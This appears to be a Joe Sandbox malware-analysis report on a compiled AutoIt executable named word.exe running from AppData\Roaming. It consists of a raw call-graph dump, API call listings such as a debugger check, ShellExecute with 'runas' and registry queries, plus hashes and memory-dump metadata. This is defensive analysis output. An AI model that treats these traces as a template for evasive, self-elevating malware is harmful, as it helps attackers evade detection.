82628->82517 82629->82514 82630->82525 82631->82526 82632->82513 82634 416fb6 __malloc_crt 69 API calls 82633->82634 82635 423615 82634->82635 82635->82535 82636->82532 82641 414cef GetSystemTimeAsFileTime __aulldiv 82638->82641 82640 4431ef 82640->82143 82641->82640 82642->82150 82644->82156 82650 4523e1 _wcscpy 82645->82650 82646 4151b0 83 API calls __fread_nolock 82646->82650 82647 44afdc GetSystemTimeAsFileTime 82647->82650 82648 452553 82648->82073 82648->82074 82649 41557c 107 API calls _fseek 82649->82650 82650->82646 82650->82647 82650->82648 82650->82649 82652 44b1b4 82651->82652 82653 44b1a6 82651->82653 82655 44b1ca 82652->82655 82656 44b1c2 82652->82656 82657 414e06 140 API calls 82652->82657 82654 414e06 140 API calls 82653->82654 82654->82652 82686 4352d1 83 API calls 2 library calls 82655->82686 82656->82101 82659 44b2c1 82657->82659 82659->82655 82661 44b2cf 82659->82661 82660 44b20d 82663 44b211 82660->82663 82664 44b23b 82660->82664 82662 44b2dc 82661->82662 82665 414e94 __fcloseall 108 API calls 82661->82665 82662->82101 82667 44b21e 82663->82667 82669 414e94 __fcloseall 108 API calls 82663->82669 82687 43526e 82664->82687 82665->82662 82670 44b22e 82667->82670 82673 414e94 __fcloseall 108 API calls 82667->82673 82668 44b242 82671 44b270 82668->82671 82672 44b248 82668->82672 82669->82667 82670->82101 82697 44b0af 113 API calls 82671->82697 82674 44b255 82672->82674 82676 414e94 __fcloseall 108 API calls 82672->82676 82673->82670 82677 44b265 82674->82677 82680 414e94 __fcloseall 108 API calls 82674->82680 82676->82674 82677->82101 82678 44b276 82698 43522c 69 API calls __mtterm 82678->82698 82680->82677 82681 44b27c 82682 44b289 82681->82682 82683 414e94 __fcloseall 108 API calls 82681->82683 82684 44b299 82682->82684 82685 414e94 __fcloseall 108 API calls 82682->82685 82683->82682 82684->82101 82685->82684 82686->82660 82688 4138ba _malloc 69 API calls 82687->82688 82689 43527d 82688->82689 82690 4138ba _malloc 69 API calls 82689->82690 82691 43528d 82690->82691 82692 4138ba _malloc 69 API calls 82691->82692 82693 43529d 82692->82693 82695 4352bc 82693->82695 82699 43522c 69 API calls __mtterm 82693->82699 82695->82668 82696 4352c8 82696->82668 82697->82678 82698->82681 82699->82696 82700->81990 82701->81991 82702->82011 82703->82005 82704->82011 82705->82011 82706->82016 82707->82024 82709->82026 82710->81915 82712 410148 SHGetDesktopFolder 82711->82712 82715 4101a3 _wcscpy 82711->82715 82713 41015a _wcscpy 82712->82713 82712->82715 82714 41018a SHGetPathFromIDListW 82713->82714 82713->82715 82714->82715 82715->81919 82716->81921 82718 40f5e0 154 API calls 82717->82718 82719 40f417 82718->82719 82720 42ca37 82719->82720 82721 40f42c 82719->82721 82722 42ca1f 82719->82722 82723 452574 142 API calls 82720->82723 82748 4037e0 141 API calls 7 library calls 82721->82748 82749 43717f 112 API calls _printf 82722->82749 82726 42ca50 82723->82726 82729 42ca76 82726->82729 82730 42ca54 82726->82730 82727 40f446 82727->81918 82728 42ca2d 82728->82720 82732 41171a 77 API calls 82729->82732 82731 434fe1 108 API calls 82730->82731 82733 42ca5e 82731->82733 82744 42cacc ctype 82732->82744 82750 43717f 112 API calls _printf 82733->82750 82735 42ca6c 82735->82729 82736 42ccc3 82737 413a88 __mtterm 69 API calls 82736->82737 82738 42cccd 82737->82738 82739 434fe1 108 API calls 82738->82739 82740 42ccda 82739->82740 82744->82736 82745 401b70 77 API calls 82744->82745 82751 445051 77 API calls _memcpy_s 82744->82751 82752 44c80c 89 API calls 3 library calls 82744->82752 82753 44b408 77 API calls 82744->82753 82754 402cc0 77 API calls 2 library calls 82744->82754 82755 4026a0 77 API calls ctype 82744->82755 82745->82744 82748->82727 82749->82728 82750->82735 82751->82744 82752->82744 82753->82744 82754->82744 82755->82744 82756->81929 82757->81928 82759 401bfb 82758->82759 82779 401cde 82758->82779 82760 4013a0 77 API calls 82759->82760 82761 401c0b 82760->82761 82762 42a9a0 LoadStringW 82761->82762 82763 401c18 82761->82763 82765 42a9bb 82762->82765 82764 4021e0 77 API calls 82763->82764 82766 401c2d 82764->82766 82767 40df50 77 API calls 82765->82767 82768 401c3a 82766->82768 82769 42a9cd 82766->82769 82775 401c53 _memset _wcscpy _wcsncpy 82767->82775 82768->82765 82770 401c44 82768->82770 82782 40d3b0 77 API calls 2 library calls 82769->82782 82781 40d3b0 77 API calls 2 library calls 82770->82781 82773 42a9dc 82774 42a9f0 82773->82774 82773->82775 82783 40d3b0 77 API calls 2 library calls 82774->82783 82778 401cc2 Shell_NotifyIconW 82775->82778 82777 42a9fe 82778->82779 82779->81939 82780->81940 82781->82775 82782->82773 82783->82777 82784 42919b 82789 40ef10 82784->82789 82787 411421 __cinit 76 API calls 82788 4291aa 82787->82788 82790 41171a 77 API calls 82789->82790 82791 40ef17 82790->82791 82792 42ad48 82791->82792 82797 40ef40 76 API calls __cinit 82791->82797 82794 40ef2a 82798 40e470 82794->82798 82797->82794 82799 40c060 77 API calls 82798->82799 82800 40e483 GetVersionExW 82799->82800 82801 4021e0 77 API calls 82800->82801 82802 40e4bb 82801->82802 82824 40e600 82802->82824 82808 42accc 82810 42ad28 GetSystemInfo 82808->82810 82814 42ad38 GetSystemInfo 82810->82814 82811 40e557 GetCurrentProcess 82844 40ee30 LoadLibraryA GetProcAddress 82811->82844 82812 40e56c 82812->82814 82837 40eee0 82812->82837 82817 40e5c9 82841 40eea0 82817->82841 82820 40e5e0 82822 40e5f1 FreeLibrary 82820->82822 82823 40e5f4 82820->82823 82821 40e5dd FreeLibrary 82821->82820 82822->82823 82823->82787 82825 40e60b 82824->82825 82826 40c740 77 API calls 82825->82826 82827 40e4c2 82826->82827 82828 40e620 82827->82828 82829 40e62a 82828->82829 82830 42ac93 82829->82830 82831 40c740 77 API calls 82829->82831 82832 40e4ce 82831->82832 82832->82808 82833 40ee70 82832->82833 82834 40e551 82833->82834 82835 40ee76 LoadLibraryA 82833->82835 82834->82811 82834->82812 82835->82834 82836 40ee87 GetProcAddress 82835->82836 82836->82834 82838 40e5bf 82837->82838 82839 40eee6 LoadLibraryA 82837->82839 82838->82810 82838->82817 82839->82838 82840 40eef7 GetProcAddress 82839->82840 82840->82838 82845 40eec0 LoadLibraryA GetProcAddress 82841->82845 82843 40e5d3 GetNativeSystemInfo 82843->82820 82843->82821 82844->82812 82845->82843 82846 42e89e 82853 40c000 82846->82853 82848 42e8ac 82864 409a40 82848->82864 82850 42e8ca 82987 44b92e VariantClear 82850->82987 82852 42f3ae 82854 40c014 82853->82854 82855 40c007 82853->82855 82857 40c01a 82854->82857 82858 40c02c 82854->82858 82988 409210 VariantClear 82855->82988 82989 409210 VariantClear 82857->82989 82859 41171a 77 API calls 82858->82859 82863 40c033 82859->82863 82860 40c00f 82860->82848 82862 40c023 82862->82848 82863->82848 82865 409a66 _wcslen 82864->82865 82866 41171a 77 API calls 82865->82866 82928 40aade _memcpy_s ctype 82865->82928 82867 409a9c _memcpy_s 82866->82867 82869 41171a 77 API calls 82867->82869 82868 401380 77 API calls 82870 42cee9 82868->82870 82871 409abd 82869->82871 82873 41171a 77 API calls 82870->82873 82872 409aeb CharUpperBuffW 82871->82872 82876 409b09 ctype 82871->82876 82871->82928 82872->82876 82915 42cf10 _memcpy_s 82873->82915 82916 409b88 ctype 82876->82916 82991 47d10e 152 API calls 82876->82991 82877 42dbb9 82878 4092c0 VariantClear 82877->82878 82879 42e5e0 82878->82879 83020 410ae0 VariantClear ctype 82879->83020 82881 42e5f2 82882 409e4a 82884 41171a 77 API calls 82882->82884 82888 409ea4 82882->82888 82882->82915 82883 40aa5b 82885 41171a 77 API calls 82883->82885 82884->82888 82903 40aa81 _memcpy_s ctype 82885->82903 82886 40c3e0 77 API calls 82886->82916 82887 409ed0 82891 42d50d 82887->82891 82951 409ef8 _memcpy_s ctype 82887->82951 82999 40b800 VariantClear VariantClear ctype 82887->82999 82888->82887 82889 41171a 77 API calls 82888->82889 82890 42d480 82889->82890 82893 42d491 82890->82893 82996 44b3f6 77 API calls 82890->82996 82895 42d527 82891->82895 83000 40b800 VariantClear VariantClear ctype 82891->83000 82892 42d195 VariantClear 82892->82916 82905 40df50 77 API calls 82893->82905 82895->82951 83001 40e2e0 VariantClear ctype 82895->83001 82896 40a3a7 82900 40a415 82896->82900 82947 42db5c 82896->82947 82897 4092c0 VariantClear 82897->82916 82907 41171a 77 API calls 82900->82907 82901 41171a 77 API calls 82901->82916 82912 41171a 77 API calls 82903->82912 82908 42d4a6 82905->82908 82922 40a41c 82907->82922 82997 4530b3 77 API calls 82908->82997 82910 42db96 83006 45e62e 118 API calls 3 library calls 82910->83006 82912->82928 82914 42d128 82918 4092c0 VariantClear 82914->82918 83019 45e62e 118 API calls 3 library calls 82915->83019 82916->82877 82916->82882 82916->82883 82916->82886 82916->82892 82916->82897 82916->82901 82916->82903 82916->82914 82916->82915 82919 42d20c 82916->82919 82992 40c620 120 API calls 82916->82992 82994 40be00 77 API calls 2 library calls 82916->82994 82995 40e380 VariantClear ctype 82916->82995 82917 42d4d7 82998 4530b3 77 API calls 82917->82998 82921 42d131 82918->82921 82919->82850 82993 410ae0 VariantClear ctype 82921->82993 82932 40a481 82922->82932 83007 40c8a0 VariantClear ctype 82922->83007 82926 402cc0 77 API calls 82926->82951 82928->82868 82929 44b3f6 77 API calls 82929->82951 82931 4092c0 VariantClear 82962 40a534 _memcpy_s ctype 82931->82962 82933 40a4ed 82932->82933 82935 42dc1e VariantClear 82932->82935 82932->82962 82939 40a4ff ctype 82933->82939 83008 40e380 VariantClear ctype 82933->83008 82934 41171a 77 API calls 82934->82951 82935->82939 82938 41171a 77 API calls 82938->82962 82939->82938 82939->82962 82940 4019e0 78 API calls 82940->82951 82943 42deb6 VariantClear 82943->82962 82944 411421 76 API calls __cinit 82944->82951 82945 40a73c 82948 42e237 82945->82948 82955 40a76b 82945->82955 82946 40e380 VariantClear 82946->82962 83005 4721e5 VariantClear 82947->83005 83012 46e709 VariantClear VariantClear ctype 82948->83012 82949 42df47 VariantClear 82949->82962 82950 42dfe9 VariantClear 82950->82962 82951->82896 82951->82910 82951->82926 82951->82928 82951->82929 82951->82934 82951->82940 82951->82944 82951->82947 82954 40a053 82951->82954 83002 45ee98 77 API calls 82951->83002 83003 404260 78 API calls 82951->83003 83004 409210 VariantClear 82951->83004 82953 40a7a2 82965 40a7ad ctype 82953->82965 83013 40b800 VariantClear VariantClear ctype 82953->83013 82954->82850 82955->82953 82978 40a800 ctype 82955->82978 82990 40b800 VariantClear VariantClear ctype 82955->82990 82958 41171a 77 API calls 82958->82962 82959 40a8b0 82973 40a8c2 ctype 82959->82973 83015 40e380 VariantClear ctype 82959->83015 82960 42e312 82963 42e337 VariantClear 82960->82963 82960->82973 82961 41171a 77 API calls 82964 42dd10 VariantInit VariantCopy 82961->82964 82962->82931 82962->82943 82962->82945 82962->82946 82962->82948 82962->82949 82962->82950 82962->82958 82962->82961 83009 46e9cd 77 API calls 82962->83009 83010 409210 VariantClear 82962->83010 83011 44cc6c VariantClear ctype 82962->83011 82963->82973 82964->82962 82969 42dd30 VariantClear 82964->82969 82966 40a7ee 82965->82966 82970 42e2a7 VariantClear 82965->82970 82965->82978 82966->82978 83014 40e380 VariantClear ctype 82966->83014 82968 42e3b2 82974 42e3da VariantClear 82968->82974 82980 40a91a ctype 82968->82980 82969->82962 82970->82978 82971 40a908 82971->82980 83016 40e380 VariantClear ctype 82971->83016 82973->82968 82973->82971 82974->82980 82976 42e47f 82981 42e4a3 VariantClear 82976->82981 82986 40a957 ctype 82976->82986 82978->82959 82978->82960 82979 40a945 82979->82986 83017 40e380 VariantClear ctype 82979->83017 82980->82976 82980->82979 82981->82986 82983 40aa22 ctype 82983->82850 82984 42e559 VariantClear 82984->82986 82986->82983 82986->82984 83018 40e380 VariantClear ctype 82986->83018 82987->82852 82988->82860 82989->82862 82990->82953 82991->82876 82992->82916 82993->82983 82994->82916 82995->82916 82996->82893 82997->82917 82998->82887 82999->82891 83000->82895 83001->82951 83002->82951 83003->82951 83004->82951 83005->82910 83006->82877 83007->82922 83008->82939 83009->82962 83010->82962 83011->82962 83012->82953 83013->82965 83014->82978 83015->82973 83016->82980 83017->82986 83018->82986 83019->82877 83020->82881 83021 4803f4 83022 48046c 83021->83022 83023 4804a7 83021->83023 83025 480499 83022->83025 83026 480473 83022->83026 83024 40c060 77 API calls 83023->83024 83045 4804b0 83024->83045 83054 47fea8 120 API calls 83025->83054 83028 480478 83026->83028 83029 48048b 83026->83029 83028->83023 83030 48047d 83028->83030 83053 47f6ef 120 API calls __itow_s 83029->83053 83052 47e8db 120 API calls 83030->83052 83032 40df50 77 API calls 83032->83045 83034 4092c0 VariantClear 83037 480b51 83034->83037 83036 480486 83036->83034 83039 4092c0 VariantClear 83037->83039 83038 40c3e0 77 API calls 83038->83045 83040 480b5a 83039->83040 83041 40e6d0 78 API calls 83041->83045 83042 4019e0 78 API calls 83042->83045 83044 409210 VariantClear 83044->83045 83045->83032 83045->83036 83045->83038 83045->83041 83045->83042 83045->83044 83046 480564 83045->83046 83048 40c760 80 API calls 83045->83048 83055 4533dc 77 API calls 83045->83055 83056 45e85e 78 API calls 83045->83056 83057 40e7e0 78 API calls 83045->83057 83058 476958 78 API calls 83045->83058 83059 47f529 119 API calls 83045->83059 83060 45e62e 118 API calls 3 library calls 83046->83060 83048->83045 83052->83036 83053->83036 83054->83036 83055->83045 83056->83045 83057->83045 83058->83045 83059->83045 83060->83036 83061 4291df 83066 40ddd0 83061->83066 83064 411421 __cinit 76 API calls 83065 4291ee 83064->83065 83067 40c060 77 API calls 83066->83067 83068 40de43 83067->83068 83073 40f0d0 83068->83073 83070 40df04 83070->83064 83071 40dee0 83071->83070 83076 40dd50 83071->83076 83082 40f110 RegOpenKeyExW 83073->83082 83077 40dd81 83076->83077 83081 40dd58 _memcpy_s ctype 83076->83081 83080 41171a 77 API calls 83077->83080 83078 41171a 77 API calls 83079 40dd5f 83078->83079 83079->83071 83080->83081 83081->83078 83083 40f13c RegQueryValueExW RegCloseKey 83082->83083 83084 40f0ee 83082->83084 83083->83084 83084->83071

                                                                            Executed Functions

                                                                            Function 00409A40 Relevance: 32.2, APIs: 15, Strings: 2, Instructions: 2432COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _wcslen.LIBCMT ref: 00409A61
                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                            • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                            • String ID: 0vH$4RH
                                                                            • API String ID: 1143807570-2085553193
                                                                            • Opcode ID: ca5efaba4490574011d478febeb3435d410ff67b3515fcc5ed7fd1e1b79fd58d
                                                                            • Instruction ID: 7c8f52bff4b3ea9a641e6aac08ab5e1c8beb32691f0f21fab5f23224d73a3634
                                                                            • Opcode Fuzzy Hash: ca5efaba4490574011d478febeb3435d410ff67b3515fcc5ed7fd1e1b79fd58d
                                                                            • Instruction Fuzzy Hash: 34238170A043109FD724DF25D480A6BB7E1BF89304F54896EE84A9B391D739EC46CB9B
                                                                            Function 0040D6D0 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 141windowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?,00000001,?,00000000), ref: 0040D6E5
                                                                              • Part of subcall function 00401F80: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\word.exe,00000104,?,?,?,?,00000000), ref: 00401FAD
                                                                              • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 00402078
                                                                              • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 0040208E
                                                                              • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020A4
                                                                              • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020BA
                                                                              • Part of subcall function 00401F80: _wcscpy.LIBCMT ref: 004020EF
                                                                            • IsDebuggerPresent.KERNEL32(?), ref: 0040D6F1
                                                                            • GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Roaming\word.exe,00000104,?,004A7CF8,004A7CFC), ref: 0040D763
                                                                              • Part of subcall function 00401440: GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 00401483
                                                                            • SetCurrentDirectoryW.KERNEL32(?,00000001,C:\Users\user\AppData\Roaming\word.exe,00000004), ref: 0040D7D6
                                                                            • MessageBoxA.USER32 ref: 00431AAB
                                                                            • SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\AppData\Roaming\word.exe,00000004), ref: 00431B0E
                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,C:\Users\user\AppData\Roaming\word.exe,00000004), ref: 00431B3F
                                                                            • GetForegroundWindow.USER32 ref: 00431B8B
                                                                            • ShellExecuteW.SHELL32(00000000), ref: 00431B92
                                                                              • Part of subcall function 004101F0: GetSysColorBrush.USER32 ref: 004101F9
                                                                              • Part of subcall function 004101F0: LoadCursorW.USER32 ref: 00410209
                                                                              • Part of subcall function 004101F0: LoadIconW.USER32 ref: 0041021F
                                                                              • Part of subcall function 004101F0: LoadIconW.USER32 ref: 00410232
                                                                              • Part of subcall function 004101F0: LoadIconW.USER32 ref: 00410245
                                                                              • Part of subcall function 004101F0: LoadImageW.USER32 ref: 0041026A
                                                                              • Part of subcall function 004101F0: RegisterClassExW.USER32 ref: 004102C6
                                                                              • Part of subcall function 004103E0: CreateWindowExW.USER32 ref: 00410415
                                                                              • Part of subcall function 004103E0: CreateWindowExW.USER32 ref: 0041043E
                                                                              • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 00410454
                                                                              • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                              • Part of subcall function 0040E1E0: _memset.LIBCMT ref: 0040E202
                                                                              • Part of subcall function 0040E1E0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memset_wcscpy
                                                                            • String ID: @GH$@GH$C:\Users\user\AppData\Roaming\word.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                            • API String ID: 2493088469-3974260756
                                                                            • Opcode ID: 1a0ed8742bd98226e3ba0f055742ccaca08136dd93b2b863f89549b94dfb798c
                                                                            • Instruction ID: f6e0ab4c143dd9a1f797559286fb6c41f0380d60009eb7dc722615656bf0e84e
                                                                            • Opcode Fuzzy Hash: 1a0ed8742bd98226e3ba0f055742ccaca08136dd93b2b863f89549b94dfb798c
                                                                            • Instruction Fuzzy Hash: 0341F731618341ABD320F7A19C49BAF3BA4AB96704F04493FF941672D1DBBC9949C72E
                                                                            Function 0040E470 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 165COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1040 40e470-40e500 call 40c060 GetVersionExW call 4021e0 call 40e600 call 40e620 1049 40e506-40e509 1040->1049 1050 42accc-42acd1 1040->1050 1051 40e540-40e555 call 40ee70 1049->1051 1052 40e50b-40e51c 1049->1052 1053 42acd3-42acdb 1050->1053 1054 42acdd-42ace0 1050->1054 1071 40e557-40e573 GetCurrentProcess call 40ee30 1051->1071 1072 40e579-40e5a8 1051->1072 1055 40e522-40e525 1052->1055 1056 42ac9b-42aca7 1052->1056 1058 42ad12-42ad20 1053->1058 1059 42ace2-42aceb 1054->1059 1060 42aced-42acf0 1054->1060 1055->1051 1062 40e527-40e537 1055->1062 1064 42acb2-42acba 1056->1064 1065 42aca9-42acad 1056->1065 1070 42ad28-42ad2d GetSystemInfo 1058->1070 1059->1058 1060->1058 1061 42acf2-42ad06 1060->1061 1066 42ad08-42ad0c 1061->1066 1067 42ad0e 1061->1067 1068 42acbf-42acc7 1062->1068 1069 40e53d 1062->1069 1064->1051 1065->1051 1066->1058 1067->1058 1068->1051 1069->1051 1074 42ad38-42ad3d GetSystemInfo 1070->1074 1071->1072 1082 40e575 1071->1082 1072->1074 1075 40e5ae-40e5c3 call 40eee0 1072->1075 1075->1070 1079 40e5c9-40e5db call 40eea0 GetNativeSystemInfo 1075->1079 1084 40e5e0-40e5ef 1079->1084 1085 40e5dd-40e5de FreeLibrary 1079->1085 1082->1072 1086 40e5f1-40e5f2 FreeLibrary 1084->1086 1087 40e5f4-40e5ff 1084->1087 1085->1084 1086->1087
                                                                            APIs
                                                                            • GetVersionExW.KERNEL32 ref: 0040E495
                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                            • GetCurrentProcess.KERNEL32(?,?), ref: 0040E560
                                                                            • GetNativeSystemInfo.KERNEL32(?,?), ref: 0040E5D3
                                                                            • FreeLibrary.KERNEL32(?), ref: 0040E5DE
                                                                            • FreeLibrary.KERNEL32(?), ref: 0040E5F2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_wcslen
                                                                            • String ID: pMH
                                                                            • API String ID: 2923339712-2522892712
                                                                            • Opcode ID: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                            • Instruction ID: 31d199e0849a18b4fe3a20375a839c17b1fda7a8e5a404adfed2e153d323e8b3
                                                                            • Opcode Fuzzy Hash: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                            • Instruction Fuzzy Hash: D4612E71508792AEC311CB69C44425ABFE07B6A308F580E6EE48483A42D379E568C7AB
                                                                            Function 0040EB70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(uxtheme.dll), ref: 0040EB7B
                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EB8D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: IsThemeActive$uxtheme.dll
                                                                            • API String ID: 2574300362-3542929980
                                                                            • Opcode ID: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                            • Instruction ID: e8120cabfd18d8fe06d2f96d8b82b2b5a4bcadd10797c678d2963416b1e4c3b8
                                                                            • Opcode Fuzzy Hash: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                            • Instruction Fuzzy Hash: 05D0C9B49407039AD7306F72C918B0A7BE4AB50342F204C3EF996A1694DBBCD0508B28
                                                                            Function 00410B90 Relevance: 35.2, APIs: 13, Strings: 7, Instructions: 167registryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410C44
                                                                            • __wsplitpath.LIBCMT ref: 00410C61
                                                                              • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                            • _wcsncat.LIBCMT ref: 00410C78
                                                                            • __wmakepath.LIBCMT ref: 00410C94
                                                                              • Part of subcall function 00413E3C: __wmakepath_s.LIBCMT ref: 00413E52
                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                            • _wcscpy.LIBCMT ref: 00410CCC
                                                                            • RegOpenKeyExW.KERNEL32 ref: 00410CE9
                                                                            • RegQueryValueExW.ADVAPI32 ref: 00429BE4
                                                                            • _wcscat.LIBCMT ref: 00429C43
                                                                            • _wcslen.LIBCMT ref: 00429C55
                                                                            • _wcslen.LIBCMT ref: 00429C66
                                                                            • _wcscat.LIBCMT ref: 00429C80
                                                                            • _wcsncpy.LIBCMT ref: 00429CC0
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00429CDE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscat_wcslen$CloseException@8FileModuleNameOpenQueryThrowValue__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpystd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                            • String ID: 8+$8+$Include$Software\AutoIt v3\AutoIt$\$d+$+
                                                                            • API String ID: 1004883554-1136608971
                                                                            • Opcode ID: f84f773e5c1f596ad2c6b40a9b7963d16100886af7a674061cbd7d72c3873958
                                                                            • Instruction ID: ef4714a7fd58501e566ba693257e1f196c1b97611c18bc9c35ab262cfa7686fb
                                                                            • Opcode Fuzzy Hash: f84f773e5c1f596ad2c6b40a9b7963d16100886af7a674061cbd7d72c3873958
                                                                            • Instruction Fuzzy Hash: B961B3B1508340DFC300EF65EC8599BBBE8FB99704F44882EF544C3261EBB59948CB5A
